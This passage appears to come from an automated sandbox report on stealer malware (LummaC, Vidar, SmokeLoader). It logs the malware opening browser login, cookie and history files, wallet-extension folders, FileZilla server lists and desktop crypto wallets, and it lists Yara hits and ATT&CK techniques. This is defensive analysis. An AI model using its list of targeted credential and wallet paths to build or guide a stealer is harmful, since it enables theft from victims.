                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: Yara matchFile source: Process Memory Space: F441.exe PID: 3192, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected CryptOne packer
                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected LummaC Stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected Vidar
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected Vidar stealer
                Source: Yara matchFile source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D080D60 sqlite3_bind_parameter_name,9_2_6D080D60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D080C40 sqlite3_bind_zeroblob,9_2_6D080C40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA8EA0 sqlite3_clear_bindings,9_2_6CFA8EA0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D080B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,9_2_6D080B40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA6410 bind,WSAGetLastError,9_2_6CFA6410
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA60B0 listen,WSAGetLastError,9_2_6CFA60B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA6070 PR_Listen,9_2_6CFA6070
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFAC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,9_2_6CFAC050
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFAC030 sqlite3_bind_parameter_count,9_2_6CFAC030
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF322D0 sqlite3_bind_blob,9_2_6CF322D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA63C0 PR_Bind,9_2_6CFA63C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA94F0 sqlite3_bind_text16,9_2_6CFA94F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA94C0 sqlite3_bind_text,9_2_6CFA94C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA9480 sqlite3_bind_null,9_2_6CFA9480
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA9400 sqlite3_bind_int64,9_2_6CFA9400

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		14
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Shared Modules                		Boot or Logon Initialization Scripts812
                Process Injection                		3
                Obfuscated Files or Information                		1
                Credentials in Registry                		12
                File and Directory Discovery                		Remote Desktop Protocol41
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)2
                Software Packing                		Security Account Manager37
                System Information Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell                		Login HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Network Share Discovery                		Distributed Component Object Model2
                Clipboard Data                		125
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                File Deletion                		LSA Secrets551
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading                		Cached Domain Credentials22
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job812
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Hidden Files and Directories                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
